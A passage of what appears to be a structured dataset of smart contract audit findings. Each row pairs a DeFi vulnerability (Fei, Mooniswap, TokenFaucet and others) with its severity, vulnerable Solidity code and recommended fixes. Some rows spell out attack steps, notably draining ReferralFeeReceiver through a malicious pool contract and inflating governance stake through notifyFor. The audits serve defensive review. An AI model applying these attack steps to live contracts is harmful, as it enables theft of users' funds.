EMERGENCY\\_ADDR = 0xc04158f7dB6F9c9fFbD5593236a1a3D69F92167c;\\n// rest of code\\n```\\n",To remove the emergency code and fully test all the affected contracts.,,"```\\n // ============================================\\n // EMERGENCY WITHDRAWAL FUNCTIONS\\n // Needs to be removed when final version deployed\\n // ============================================\\n function emergencyWithdraw(GlobalConfig globalConfig, address \\_token) public {\\n address cToken = globalConfig.tokenInfoRegistry().getCToken(\\_token);\\n// rest of code\\n```\\n" +Accounts contains expensive looping,medium,"`Accounts.getBorrowETH` performs multiple external calls to `GlobalConfig` and `TokenRegistry` within a for loop:\\n```\\nfunction getBorrowETH(\\n address \\_accountAddr\\n) public view returns (uint256 borrowETH) {\\n uint tokenNum = globalConfig.tokenInfoRegistry().getCoinLength();\\n //console.log(""tokenNum"", 
tokenNum);\\n for(uint i = 0; i < tokenNum; i++) {\\n if(isUserHasBorrows(\\_accountAddr, uint8(i))) {\\n address tokenAddress = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(tokenAddress != ETH\\_ADDR) {\\n divisor = 10 \\*\\* uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(tokenAddress));\\n }\\n borrowETH = borrowETH.add(getBorrowBalanceCurrent(tokenAddress, \\_accountAddr).mul(globalConfig.tokenInfoRegistry().priceFromIndex(i)).div(divisor));\\n }\\n }\\n return borrowETH;\\n}\\n```\\n\\nThe loop also makes additional external calls and delegatecalls from:\\nTokenRegistry.priceFromIndex:\\n```\\nfunction priceFromIndex(uint index) public view returns(uint256) {\\n require(index < tokens.length, ""coinIndex must be smaller than the coins length."");\\n address tokenAddress = tokens[index];\\n // Temp fix\\n if(Utils.\\_isETH(address(globalConfig), tokenAddress)) {\\n return 1e18;\\n }\\n return uint256(globalConfig.chainLink().getLatestAnswer(tokenAddress));\\n}\\n```\\n\\nAccounts.getBorrowBalanceCurrent:\\n```\\nfunction getBorrowBalanceCurrent(\\n address \\_token,\\n address \\_accountAddr\\n) public view returns (uint256 borrowBalance) {\\n AccountTokenLib.TokenInfo storage tokenInfo = accounts[\\_accountAddr].tokenInfos[\\_token];\\n uint accruedRate;\\n if(tokenInfo.getBorrowPrincipal() == 0) {\\n return 0;\\n } else {\\n if(globalConfig.bank().borrowRateIndex(\\_token, tokenInfo.getLastBorrowBlock()) == 0) {\\n accruedRate = INT\\_UNIT;\\n } else {\\n accruedRate = globalConfig.bank().borrowRateIndexNow(\\_token)\\n .mul(INT\\_UNIT)\\n .div(globalConfig.bank().borrowRateIndex(\\_token, tokenInfo.getLastBorrowBlock()));\\n }\\n return tokenInfo.getBorrowBalance(accruedRate);\\n }\\n}\\n```\\n\\nIn a worst case scenario, each iteration may perform a maximum of 25+ calls/delegatecalls. 
Assuming a maximum `tokenNum` of 128 (TokenRegistry.MAX_TOKENS), the gas cost for this method may reach upwards of 2 million for external calls alone.\\nGiven that this figure would only be a portion of the total transaction gas cost, `getBorrowETH` may represent a DoS risk within the `Accounts` contract.","Avoid for loops unless absolutely necessary\\nWhere possible, consolidate multiple subsequent calls to the same contract to a single call, and store the results of calls in local variables for re-use. For example,\\nInstead of this:\\n```\\nuint tokenNum = globalConfig.tokenInfoRegistry().getCoinLength();\\nfor(uint i = 0; i < tokenNum; i++) {\\n if(isUserHasBorrows(\\_accountAddr, uint8(i))) {\\n address tokenAddress = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(tokenAddress != ETH\\_ADDR) {\\n divisor = 10 \\*\\* uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(tokenAddress));\\n }\\n borrowETH = borrowETH.add(getBorrowBalanceCurrent(tokenAddress, \\_accountAddr).mul(globalConfig.tokenInfoRegistry().priceFromIndex(i)).div(divisor));\\n }\\n}\\n```\\n\\nModify `TokenRegistry` to support a single call, and cache intermediate results like this:\\n```\\nTokenRegistry registry = globalConfig.tokenInfoRegistry();\\nuint tokenNum = registry.getCoinLength();\\nfor(uint i = 0; i < tokenNum; i++) {\\n if(isUserHasBorrows(\\_accountAddr, uint8(i))) {\\n // here, getPriceFromIndex(i) performs all of the steps as the code above, but with only 1 ext call\\n borrowETH = borrowETH.add(getBorrowBalanceCurrent(tokenAddress, \\_accountAddr).mul(registry.getPriceFromIndex(i)).div(divisor));\\n }\\n}\\n```\\n",,"```\\nfunction getBorrowETH(\\n address \\_accountAddr\\n) public view returns (uint256 borrowETH) {\\n uint tokenNum = globalConfig.tokenInfoRegistry().getCoinLength();\\n //console.log(""tokenNum"", tokenNum);\\n for(uint i = 0; i < tokenNum; i++) {\\n if(isUserHasBorrows(\\_accountAddr, uint8(i))) {\\n address 
tokenAddress = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(tokenAddress != ETH\\_ADDR) {\\n divisor = 10 \\*\\* uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(tokenAddress));\\n }\\n borrowETH = borrowETH.add(getBorrowBalanceCurrent(tokenAddress, \\_accountAddr).mul(globalConfig.tokenInfoRegistry().priceFromIndex(i)).div(divisor));\\n }\\n }\\n return borrowETH;\\n}\\n```\\n" +Naming inconsistency,low,There are some inconsistencies in the naming of some functions with what they do.\\n```\\n function getCoinLength() public view returns (uint256 length) { //@audit-info coin vs token\\n return tokens.length;\\n }\\n```\\n,Review the code for the naming inconsistencies.,,```\\n function getCoinLength() public view returns (uint256 length) { //@audit-info coin vs token\\n return tokens.length;\\n }\\n```\\n +TokenFaucet refill can have an unexpected outcome,medium,"The `TokenFaucet` contract can only disburse tokens to the users if it has enough balance. When the contract is running out of tokens, it stops dripping.\\n```\\nuint256 assetTotalSupply = asset.balanceOf(address(this));\\nuint256 availableTotalSupply = assetTotalSupply.sub(totalUnclaimed);\\nuint256 newSeconds = currentTimestamp.sub(lastDripTimestamp);\\nuint256 nextExchangeRateMantissa = exchangeRateMantissa;\\nuint256 newTokens;\\nuint256 measureTotalSupply = measure.totalSupply();\\n\\nif (measureTotalSupply > 0 && availableTotalSupply > 0 && newSeconds > 0) {\\n newTokens = newSeconds.mul(dripRatePerSecond);\\n if (newTokens > availableTotalSupply) {\\n newTokens = availableTotalSupply;\\n }\\n uint256 indexDeltaMantissa = measureTotalSupply > 0 ? FixedPoint.calculateMantissa(newTokens, measureTotalSupply) : 0;\\n nextExchangeRateMantissa = nextExchangeRateMantissa.add(indexDeltaMantissa);\\n\\n emit Dripped(\\n newTokens\\n );\\n}\\n```\\n\\nThe owners of the faucet can decide to refill the contract so it can disburse tokens again. 
If there's been a lot of time since the faucet was drained, the `lastDripTimestamp` value can be far behind the `currentTimestamp`. In that case, the users can instantly withdraw some amount (up to all the balance) right after the refill.","To avoid uncertainty, it's essential to call the `drip` function before the refill. If this call is made in a separate transaction, the owner should make sure that this transaction was successfully mined before sending tokens for the refill.",,"```\\nuint256 assetTotalSupply = asset.balanceOf(address(this));\\nuint256 availableTotalSupply = assetTotalSupply.sub(totalUnclaimed);\\nuint256 newSeconds = currentTimestamp.sub(lastDripTimestamp);\\nuint256 nextExchangeRateMantissa = exchangeRateMantissa;\\nuint256 newTokens;\\nuint256 measureTotalSupply = measure.totalSupply();\\n\\nif (measureTotalSupply > 0 && availableTotalSupply > 0 && newSeconds > 0) {\\n newTokens = newSeconds.mul(dripRatePerSecond);\\n if (newTokens > availableTotalSupply) {\\n newTokens = availableTotalSupply;\\n }\\n uint256 indexDeltaMantissa = measureTotalSupply > 0 ? FixedPoint.calculateMantissa(newTokens, measureTotalSupply) : 0;\\n nextExchangeRateMantissa = nextExchangeRateMantissa.add(indexDeltaMantissa);\\n\\n emit Dripped(\\n newTokens\\n );\\n}\\n```\\n" +Gas Optimization on transfers,low,"In TokenFaucet, on every transfer `_captureNewTokensForUser` is called twice. This function does a few calculations and writes the latest UserState to the storage. 
However, if `lastExchangeRateMantissa == exchangeRateMantissa`, or in other words, two transfers happen in the same block, there are no changes in the newToken amounts, so there is an extra storage store with the same values.\\n`deltaExchangeRateMantissa` will be 0 in case two transfers ( no matter from or to) are in the same block for a user.\\n```\\n uint256 deltaExchangeRateMantissa = uint256(exchangeRateMantissa).sub(userState.lastExchangeRateMantissa);\\n uint128 newTokens = FixedPoint.multiplyUintByMantissa(userMeasureBalance, deltaExchangeRateMantissa).toUint128();\\n userStates[user] = UserState({\\n lastExchangeRateMantissa: exchangeRateMantissa,\\n balance: uint256(userState.balance).add(newTokens).toUint128()\\n });\\n```\\n","Return without storage update if `lastExchangeRateMantissa == exchangeRateMantissa`, or by another method if `deltaExchangeRateMantissa == 0`. This reduces the gas cost for active users (high number of transfers that might be in the same block)",,"```\\n uint256 deltaExchangeRateMantissa = uint256(exchangeRateMantissa).sub(userState.lastExchangeRateMantissa);\\n uint128 newTokens = FixedPoint.multiplyUintByMantissa(userMeasureBalance, deltaExchangeRateMantissa).toUint128();\\n userStates[user] = UserState({\\n lastExchangeRateMantissa: exchangeRateMantissa,\\n balance: uint256(userState.balance).add(newTokens).toUint128()\\n });\\n```\\n" +Handle transfer tokens where from == to,low,"In TokenFaucet, when calling `beforeTokenTransfer` it should also be optimized when `to == from`. 
This is to prevent any possible issues with internal accounting and token drip calculations.\\n```\\n// rest of code\\n if (token == address(measure) && from != address(0)) { //add && from != to\\n drip();\\n// rest of code\\n```\\n","As per the ERC20 standard, `from == to` can be allowed, but check in `beforeTokenTransfer` that if `to == from`, then do not call `_captureNewTokensForUser(from);` again.",,```\\n// rest of code\\n if (token == address(measure) && from != address(0)) { //add && from != to\\n drip();\\n// rest of code\\n```\\n
This commitment may be performed on behalf of other users, as long as the calling account has sufficient allowance:\\n```\\nfunction commit(address from, address to, uint amount) external override onlyGenesisPeriod {\\n burnFrom(from, amount);\\n\\n committedFGEN[to] = amount;\\n totalCommittedFGEN += amount;\\n\\n emit Commit(from, to, amount);\\n}\\n```\\n\\nThe `amount` stored in the recipient's `committedFGEN` balance overwrites any previously-committed value. Additionally, this also allows anyone to commit an `amount` of “0” to any account, deleting their commitment entirely.",Ensure the committed amount is added to the existing commitment.,,"```\\nfunction commit(address from, address to, uint amount) external override onlyGenesisPeriod {\\n burnFrom(from, amount);\\n\\n committedFGEN[to] = amount;\\n totalCommittedFGEN += amount;\\n\\n emit Commit(from, to, amount);\\n}\\n```\\n" +UniswapIncentive overflow on pre-transfer hooks,high,"Before a token transfer is performed, `Fei` performs some combination of mint/burn operations via UniswapIncentive.incentivize:\\n```\\nfunction incentivize(\\n address sender,\\n address receiver, \\n address operator,\\n uint amountIn\\n) external override onlyFei {\\n updateOracle();\\n\\n if (isPair(sender)) {\\n incentivizeBuy(receiver, amountIn);\\n }\\n\\n if (isPair(receiver)) {\\n require(isSellAllowlisted(sender) || isSellAllowlisted(operator), ""UniswapIncentive: Blocked Fei sender or operator"");\\n incentivizeSell(sender, amountIn);\\n }\\n}\\n```\\n\\nBoth `incentivizeBuy` and `incentivizeSell` calculate buy/sell incentives using overflow-prone math, then mint / burn from the target according to the results. 
This may have unintended consequences, like allowing a caller to mint tokens before transferring them, or burn tokens from their recipient.\\n`incentivizeBuy` calls `getBuyIncentive` to calculate the final minted value:\\n```\\nfunction incentivizeBuy(address target, uint amountIn) internal ifMinterSelf {\\n if (isExemptAddress(target)) {\\n return;\\n }\\n\\n (uint incentive, uint32 weight,\\n Decimal.D256 memory initialDeviation,\\n Decimal.D256 memory finalDeviation) = getBuyIncentive(amountIn);\\n\\n updateTimeWeight(initialDeviation, finalDeviation, weight);\\n if (incentive != 0) {\\n fei().mint(target, incentive); \\n }\\n}\\n```\\n\\n`getBuyIncentive` calculates price deviations after casting `amount` to an `int256`, which may overflow:\\n```\\nfunction getBuyIncentive(uint amount) public view override returns(\\n uint incentive,\\n uint32 weight,\\n Decimal.D256 memory initialDeviation,\\n Decimal.D256 memory finalDeviation\\n) {\\n (initialDeviation, finalDeviation) = getPriceDeviations(-1 \\* int256(amount));\\n```\\n",Resolution\\nThis was addressed in fei-protocol/fei-protocol-core#15.\\nEnsure casts in `getBuyIncentive` and `getSellPenalty` do not overflow.,,"```\\nfunction incentivize(\\n address sender,\\n address receiver, \\n address operator,\\n uint amountIn\\n) external override onlyFei {\\n updateOracle();\\n\\n if (isPair(sender)) {\\n incentivizeBuy(receiver, amountIn);\\n }\\n\\n if (isPair(receiver)) {\\n require(isSellAllowlisted(sender) || isSellAllowlisted(operator), ""UniswapIncentive: Blocked Fei sender or operator"");\\n incentivizeSell(sender, amountIn);\\n }\\n}\\n```\\n" +BondingCurve allows users to acquire FEI before launch,medium,"`BondingCurve.allocate` allocates the protocol's held PCV, then calls `_incentivize`, which rewards the caller with FEI if a certain amount of time has passed:\\n```\\n/// @notice if window has passed, reward caller and reset window\\nfunction \\_incentivize() internal virtual {\\n if (isTimeEnded()) 
{\\n \\_initTimed(); // reset window\\n fei().mint(msg.sender, incentiveAmount);\\n }\\n}\\n```\\n\\n`allocate` can be called before genesis launch, as long as the contract holds some nonzero PCV. By force-sending the contract 1 wei, anyone can bypass the majority of checks and actions in `allocate`, and mint themselves FEI each time the timer expires.",Prevent `allocate` from being called before genesis launch.,,"```\\n/// @notice if window has passed, reward caller and reset window\\nfunction \\_incentivize() internal virtual {\\n if (isTimeEnded()) {\\n \\_initTimed(); // reset window\\n fei().mint(msg.sender, incentiveAmount);\\n }\\n}\\n```\\n" +Overflow/underflow protection,medium,"Having overflow/underflow vulnerabilities is very common for smart contracts. It is usually mitigated by using `SafeMath` or using solidity version ^0.8 (after solidity 0.8 arithmetical operations already have default overflow/underflow protection).\\nIn this code, many arithmetical operations are used without the ‘safe' version. The reasoning behind it is that all the values are derived from the actual ETH values, so they can't overflow.\\nOn the other hand, some operations can't be checked for overflow/underflow without going much deeper into the codebase that is out of scope:\\n```\\nuint totalGenesisTribe = tribeBalance() - totalCommittedTribe;\\n```\\n","Resolution\\nThis was partially addressed in fei-protocol/fei-protocol-core#17 by using `SafeMath` for the specific example given in the description.\\nIn our opinion, it is still safer to have these operations in a safe mode. 
So we recommend using `SafeMath` or solidity version ^0.8 compiler.",,```\\nuint totalGenesisTribe = tribeBalance() - totalCommittedTribe;\\n```\\n +Unchecked return value for IWETH.transfer call,medium,"In `EthUniswapPCVController`, there is a call to `IWETH.transfer` that does not check the return value:\\n```\\nweth.transfer(address(pair), amount);\\n```\\n\\nIt is usually good to add a require-statement that checks the return value or to use something like safeTransfer; unless one is sure the given token reverts in case of a failure.",Consider adding a require-statement or using `safeTransfer`.,,"```\\nweth.transfer(address(pair), amount);\\n```\\n" +GenesisGroup.emergencyExit remains functional after launch,medium,"`emergencyExit` is intended as an escape mechanism for users in the event the genesis `launch` method fails or is frozen. `emergencyExit` becomes callable 3 days after `launch` is callable. These two methods are intended to be mutually-exclusive, but are not: either method remains callable after a successful call to the other.\\nThis may result in accounting edge cases. 
In particular, `emergencyExit` fails to decrease `totalCommittedFGEN` by the exiting user's commitment:\\n```\\nburnFrom(from, amountFGEN);\\ncommittedFGEN[from] = 0;\\n\\npayable(to).transfer(total);\\n```\\n\\nAs a result, calling launch after a user performs an exit will incorrectly calculate the amount of FEI to swap:\\n```\\nuint amountFei = feiBalance() \\* totalCommittedFGEN / (totalSupply() + totalCommittedFGEN);\\nif (amountFei != 0) {\\n totalCommittedTribe = ido.swapFei(amountFei);\\n}\\n```\\n","Ensure `launch` cannot be called if `emergencyExit` has been called\\nEnsure `emergencyExit` cannot be called if `launch` has been called\\nIn `emergencyExit`, reduce `totalCommittedFGEN` by the exiting user's committed amount",,"```\\nburnFrom(from, amountFGEN);\\ncommittedFGEN[from] = 0;\\n\\npayable(to).transfer(total);\\n```\\n" +Unchecked return value for transferFrom calls,medium,"There are two `transferFrom` calls that do not check the return value (some tokens signal failure by returning false):\\n```\\nstakedToken.transferFrom(from, address(this), amount);\\n```\\n\\n```\\nfei().transferFrom(msg.sender, address(pair), amountFei);\\n```\\n\\nIt is usually good to add a require-statement that checks the return value or to use something like safeTransferFrom; unless one is sure the given token reverts in case of a failure.",Consider adding a require-statement or using `safeTransferFrom`.,,"```\\nstakedToken.transferFrom(from, address(this), amount);\\n```\\n" +Pool: claiming to the pool itself causes accounting issues,low,"```\\nfunction \\_claim(address from, address to) internal returns (uint256) {\\n (uint256 amountReward, uint256 amountPool) = redeemableReward(from);\\n require(amountPool != 0, ""Pool: User has no redeemable pool tokens"");\\n\\n \\_burnFrom(from, amountPool);\\n \\_incrementClaimed(amountReward);\\n\\n rewardToken.transfer(to, amountReward);\\n return amountReward;\\n}\\n```\\n\\nIf the destination address `to` is the pool itself, the 
pool will burn tokens and increment the amount of tokens claimed, then transfer the reward tokens `to` itself.",Resolution\\nThis was addressed in fei-protocol/fei-protocol-core#57\\nPrevent claims from specifying the pool as a destination.,,"```\\nfunction \\_claim(address from, address to) internal returns (uint256) {\\n (uint256 amountReward, uint256 amountPool) = redeemableReward(from);\\n require(amountPool != 0, ""Pool: User has no redeemable pool tokens"");\\n\\n \\_burnFrom(from, amountPool);\\n \\_incrementClaimed(amountReward);\\n\\n rewardToken.transfer(to, amountReward);\\n return amountReward;\\n}\\n```\\n" +Assertions that can fail,low,"In `UniswapSingleEthRouter` there are two assert-statements that may fail:\\n```\\nassert(msg.sender == address(WETH)); // only accept ETH via fallback from the WETH contract\\n```\\n\\n```\\nassert(IWETH(WETH).transfer(address(PAIR), amountIn));\\n```\\n\\nSince they do some sort of input validation it might be good to replace them with require-statements. I would only use asserts for checks that should never fail and failure would constitute a bug in the code.",Consider replacing the assert-statements with require-statements. An additional benefit is that this will not result in consuming all the gas in case of a violation.,,```\\nassert(msg.sender == address(WETH)); // only accept ETH via fallback from the WETH contract\\n```\\n +Simplify API of GenesisGroup.purchase,low,"The API of `GenesisGroup.purchase` could be simplified by not including the `value` parameter that is required to be equivalent to msg.value:\\n```\\nrequire(msg.value == value, ""GenesisGroup: value mismatch"");\\n```\\n\\nUsing `msg.value` might make the API more explicit and avoid requiring `msg.value == value`. 
It can also save some gas due to fewer inputs and fewer checks.",Consider dropping the `value` parameter and changing the code to use `msg.value` instead.,,"```\\nrequire(msg.value == value, ""GenesisGroup: value mismatch"");\\n```\\n" +[Out of Scope] ReferralFeeReceiver - anyone can steal all the funds that belong to ReferralFeeReceiver Unverified,high,"Note: This issue was raised in components that were being affected by the scope reduction as outlined in the section “Scope” and are, therefore, only shallowly validated. Nevertheless, we find it important to communicate such potential findings and ask the client to further investigate.\\nThe `ReferralFeeReceiver` receives pool shares when users `swap()` tokens in the pool. A `ReferralFeeReceiver` may be used with multiple pools and, therefore, be a lucrative target as it is holding pool shares.\\nAny token or `ETH` that belongs to the `ReferralFeeReceiver` is at risk and can be drained by any user by providing a custom `mooniswap` pool contract that references existing token holdings.\\nIt should be noted that none of the functions in `ReferralFeeReceiver` verify that the user-provided `mooniswap` pool address was actually deployed by the linked `MooniswapFactory`. The factory provides certain security guarantees about `mooniswap` pool contracts (e.g. valid `mooniswap` contract, token deduplication, tokenA!=tokenB, enforced token sorting, …), however, since the `ReferralFeeReceiver` does not verify the user-provided `mooniswap` address they are left unchecked.\\nAdditional Notes\\n`freezeEpoch` - (callable by anyone) performs a `pool.withdraw()` with the `minAmounts` check being disabled. This may allow someone to call this function at a time where the contract actually gets a bad deal.\\n`trade` - (callable by anyone) can intentionally be used to perform bad trades (front-runnable)\\n`trade` - (callable by anyone) appears to implement inconsistent behavior when sending out `availableBalance`. 
`ETH` is sent to `tx.origin` (the caller) while tokens are sent to the user-provided `mooniswap` address.\\n```\\nif (path[0].isETH()) {\\n tx.origin.transfer(availableBalance); // solhint-disable-line avoid-tx-origin\\n} else {\\n path[0].safeTransfer(address(mooniswap), availableBalance);\\n}\\n```\\n\\nmultiple methods - since `mooniswap` is a user-provided address there are a lot of opportunities to reenter the contract. Consider adding reentrancy guards as another security layer (e.g. `claimCurrentEpoch` and others).\\nmultiple methods - do not validate the amount of tokens that are returned, causing an evm assertion due to out of bounds index access.\\n```\\nIERC20[] memory tokens = mooniswap.getTokens();\\nuint256 token0Balance = tokens[0].uniBalanceOf(address(this));\\nuint256 token1Balance = tokens[1].uniBalanceOf(address(this));\\n```\\n\\nin `GovernanceFeeReceiver` anyone can intentionally force unwrapping of pool tokens or perform swaps in the worst time possible. e.g. The checks for `withdraw(..., minAmounts)` is disabled.\\n```\\nfunction unwrapLPTokens(Mooniswap mooniswap) external validSpread(mooniswap) {\\n mooniswap.withdraw(mooniswap.balanceOf(address(this)), new uint256[](0));\\n}\\n\\nfunction swap(IERC20[] memory path) external validPath(path) {\\n (uint256 amount,) = \\_maxAmountForSwap(path, path[0].uniBalanceOf(address(this)));\\n uint256 result = \\_swap(path, amount, payable(address(rewards)));\\n rewards.notifyRewardAmount(result);\\n}\\n```\\n\\nA malicious user can drain all token by calling `claimFrozenEpoch` with a custom contract as `mooniswap` that returns a token address the `ReferralFeeReceiver` contracts holds token from in `IERC20[] memory tokens = mooniswap.getTokens();`. 
A subsequent call to `_transferTokenShare()` will then send out any amount of token requested by the attacker to the attacker-controlled address (msg.sender).\\nLet's assume the following scenario:\\n`ReferralFeeReceiver` holds `DAI` token and we want to steal them.\\nAn attacker may be able to drain the contract from `DAI` token via `claimFrozenToken` if\\nthey control the `mooniswap` address argument and provide a malicious contract\\n`user.share[mooniswap][firstUnprocessedEpoch] > 0` - this can be arbitrarily set in `updateReward`\\n`token.epochBalance[currentEpoch].token0Balance > 0` - this can be manipulated in `freezeEpoch` by providing a malicious `mooniswap` contract\\nthey own a worthless `ERC20` token e.g. named `ATTK`\\nThe following steps outline the attack:\\nThe attacker calls into `updateReward` to set `user.share[mooniswap][currentEpoch]` to a value that is greater than zero to make sure that `share` in `claimFrozenEpoch` takes the `_transferTokenShare` path.\\n```\\nfunction updateReward(address referral, uint256 amount) external override {\\n Mooniswap mooniswap = Mooniswap(msg.sender);\\n TokenInfo storage token = tokenInfo[mooniswap];\\n UserInfo storage user = userInfo[referral];\\n uint256 currentEpoch = token.currentEpoch;\\n\\n // Add new reward to current epoch\\n user.share[mooniswap][currentEpoch] = user.share[mooniswap][currentEpoch].add(amount);\\n token.epochBalance[currentEpoch].totalSupply = token.epochBalance[currentEpoch].totalSupply.add(amount);\\n\\n // Collect all processed epochs and advance user token epoch\\n \\_collectProcessedEpochs(user, token, mooniswap, currentEpoch);\\n}\\n```\\n\\nThe attacker then calls `freezeEpoch()` providing the malicious `mooniswap` contract address controlled by the attacker.\\nThe malicious contract returns token that is controlled by the attacker (e.g. 
ATTK) in a call to `mooniswap.getTokens();`\\nThe contract then stores the current balance of the attacker-controlled token in `token0Balance/token1Balance`. Note that the token being returned here by the malicious contract can be different from the one we're checking out in the last step (balance manipulation via `ATTK`, checkout of `DAI` in the last step).\\nThen the contract calls out to the malicious `mooniswap` contract. This gives the malicious contract an easy opportunity to send some attacker-controlled token (ATTK) to the `ReferralFeeReceiver` in order to freely manipulate the frozen tokenbalances (tokens[0].uniBalanceOf(address(this)).sub(token0Balance);).\\nNote that the used token addresses are never stored anywhere. The balances recorded here are for an attacker-controlled token (ATTK), not the actual one that we're about to steal (e.g. DAI)\\nThe token balances are now set-up for checkout in the last step (claimFrozenEpoch).\\n```\\nfunction freezeEpoch(Mooniswap mooniswap) external validSpread(mooniswap) {\\n TokenInfo storage token = tokenInfo[mooniswap];\\n uint256 currentEpoch = token.currentEpoch;\\n require(token.firstUnprocessedEpoch == currentEpoch, ""Previous epoch is not finalized"");\\n\\n IERC20[] memory tokens = mooniswap.getTokens();\\n uint256 token0Balance = tokens[0].uniBalanceOf(address(this));\\n uint256 token1Balance = tokens[1].uniBalanceOf(address(this));\\n mooniswap.withdraw(mooniswap.balanceOf(address(this)), new uint256[](0));\\n token.epochBalance[currentEpoch].token0Balance = tokens[0].uniBalanceOf(address(this)).sub(token0Balance);\\n token.epochBalance[currentEpoch].token1Balance = tokens[1].uniBalanceOf(address(this)).sub(token1Balance);\\n token.currentEpoch = currentEpoch.add(1);\\n}\\n```\\n\\nA call to `claimFrozenEpoch` checks-out the previously frozen token balance.\\nThe `claim > 0` requirement was fulfilled in step 1.\\nThe token balance was prepared for the attacker-controlled token (ATTK) in step 2, but we're 
now checking out `DAI`.\\nWhen the contract calls out to the attackers `mooniswap` contract the call to `IERC20[] memory tokens = mooniswap.getTokens();` returns the address of the token to be stolen (e.g. DAI) instead of the attacker-controlled token (ATTK) that was used to set-up the balance records.\\nSubsequently, the valuable target tokens (DAI) are sent out to the caller in `_transferTokenShare`.\\n```\\nif (share > 0) {\\n EpochBalance storage epochBalance = token.epochBalance[firstUnprocessedEpoch];\\n uint256 totalSupply = epochBalance.totalSupply;\\n user.share[mooniswap][firstUnprocessedEpoch] = 0;\\n epochBalance.totalSupply = totalSupply.sub(share);\\n\\n IERC20[] memory tokens = mooniswap.getTokens();\\n epochBalance.token0Balance = \\_transferTokenShare(tokens[0], epochBalance.token0Balance, share, totalSupply);\\n epochBalance.token1Balance = \\_transferTokenShare(tokens[1], epochBalance.token1Balance, share, totalSupply);\\n epochBalance.inchBalance = \\_transferTokenShare(inchToken, epochBalance.inchBalance, share, totalSupply);\\n```\\n","Resolution\\nAccording to the client, this issue is addressed in 1inch-exchange/1inch-liquidity-protocol#2 and the reentrancy in `FeeReceiver` in 1inch-exchange/[email protected]e9c6a03\\n(This fix is as reported by the developer team, but has not been verified by Diligence).\\nEnforce that the user-provided `mooniswap` contract was actually deployed by the linked factory. Other contracts cannot be trusted. Consider implementing token sorting and de-duplication (tokenA!=tokenB) in the pool contract constructor as well. Consider employing a reentrancy guard to safeguard the contract from reentrancy attacks.\\nImprove testing. The methods mentioned here are not covered at all. 
Improve documentation and provide a specification that outlines how this contract is supposed to be used.\\nReview the “additional notes” provided with this issue.",,"```\\nif (path[0].isETH()) {\\n tx.origin.transfer(availableBalance); // solhint-disable-line avoid-tx-origin\\n} else {\\n path[0].safeTransfer(address(mooniswap), availableBalance);\\n}\\n```\\n" +GovernanceMothership - notifyFor allows to arbitrarily create new or override other users stake in governance modules Unverified,high,"The `notify*` methods are called to update linked governance modules when an accounts stake changes in the Mothership. The linked modules then update their own balances of the user to accurately reflect the account's real stake in the Mothership.\\nBesides `notify` there's also a method named `notifyFor` which is publicly accessible. It is assumed that the method should be used similar to `notify` to force an update for another account's balance.\\nHowever, invoking the method forces an update in the linked modules for the provided address, but takes `balanceOf(msg.sender)` instead of `balanceOf(account)`. This allows malicious actors to:\\nArbitrarily change other accounts stake in linked governance modules (e.g. zeroing stake, increasing stake) based on the callers stake in the mothership\\nDuplicate stake out of thin air to arbitrary addresses (e.g. 
staking in mothership once and calling `notifyFor` many other account addresses)\\npublicly accessible method allows forcing stake updates for arbitrary users\\n```\\nfunction notifyFor(address account) external {\\n \\_notifyFor(account, balanceOf(msg.sender));\\n}\\n```\\n\\nthe method calls the linked governance modules\\n```\\nfunction \\_notifyFor(address account, uint256 balance) private {\\n uint256 modulesLength = \\_modules.length();\\n for (uint256 i = 0; i < modulesLength; ++i) {\\n IGovernanceModule(\\_modules.at(i)).notifyStakeChanged(account, balance);\\n }\\n}\\n```\\n\\nwhich will arbitrarily `mint` or `burn` stake in the `BalanceAccounting` of `Factory` or `Reward` (or other linked governance modules)\\n```\\nfunction notifyStakeChanged(address account, uint256 newBalance) external override onlyMothership {\\n \\_notifyStakeChanged(account, newBalance);\\n}\\n```\\n\\n```\\nfunction \\_notifyStakeChanged(address account, uint256 newBalance) internal override {\\n uint256 balance = balanceOf(account);\\n if (newBalance > balance) {\\n \\_mint(account, newBalance.sub(balance));\\n } else if (newBalance < balance) {\\n \\_burn(account, balance.sub(newBalance));\\n } else {\\n return;\\n }\\n uint256 newTotalSupply = totalSupply();\\n\\n \\_defaultFee.updateBalance(account, \\_defaultFee.votes[account], balance, newBalance, newTotalSupply, \\_DEFAULT\\_FEE, \\_emitDefaultFeeVoteUpdate);\\n \\_defaultSlippageFee.updateBalance(account, \\_defaultSlippageFee.votes[account], balance, newBalance, newTotalSupply, \\_DEFAULT\\_SLIPPAGE\\_FEE, \\_emitDefaultSlippageFeeVoteUpdate);\\n \\_defaultDecayPeriod.updateBalance(account, \\_defaultDecayPeriod.votes[account], balance, newBalance, newTotalSupply, \\_DEFAULT\\_DECAY\\_PERIOD, \\_emitDefaultDecayPeriodVoteUpdate);\\n \\_referralShare.updateBalance(account, \\_referralShare.votes[account], balance, newBalance, newTotalSupply, \\_DEFAULT\\_REFERRAL\\_SHARE, \\_emitReferralShareVoteUpdate);\\n 
\\_governanceShare.updateBalance(account, \\_governanceShare.votes[account], balance, newBalance, newTotalSupply, \\_DEFAULT\\_GOVERNANCE\\_SHARE, \\_emitGovernanceShareVoteUpdate);\\n}\\n```\\n\\n```\\nfunction \\_notifyStakeChanged(address account, uint256 newBalance) internal override updateReward(account) {\\n uint256 balance = balanceOf(account);\\n if (newBalance > balance) {\\n \\_mint(account, newBalance.sub(balance));\\n } else if (newBalance < balance) {\\n \\_burn(account, balance.sub(newBalance));\\n }\\n}\\n```\\n","Remove `notifyFor` or change it to take the balance of the correct account `_notifyFor(account, balanceOf(msg.sender))`.\\nIt is questionable whether the public `notify*()` family of methods is actually needed as stake should only change - and thus an update of linked modules should only be required - if an account calls `stake()` or `unstake()`. It should therefore be considered to remove `notify()`, `notifyFor` and `batchNotifyFor`.",,"```\\nfunction notifyFor(address account) external {\\n \\_notifyFor(account, balanceOf(msg.sender));\\n}\\n```\\n" +The uniTransferFrom function can potentially be used with invalid params Unverified,medium,"The system is using the `UniERC20` contract to incapsulate transfers of both ERC-20 tokens and ETH. This contract has `uniTransferFrom` function that can be used for any ERC-20 or ETH:\\n```\\nfunction uniTransferFrom(IERC20 token, address payable from, address to, uint256 amount) internal {\\n if (amount > 0) {\\n if 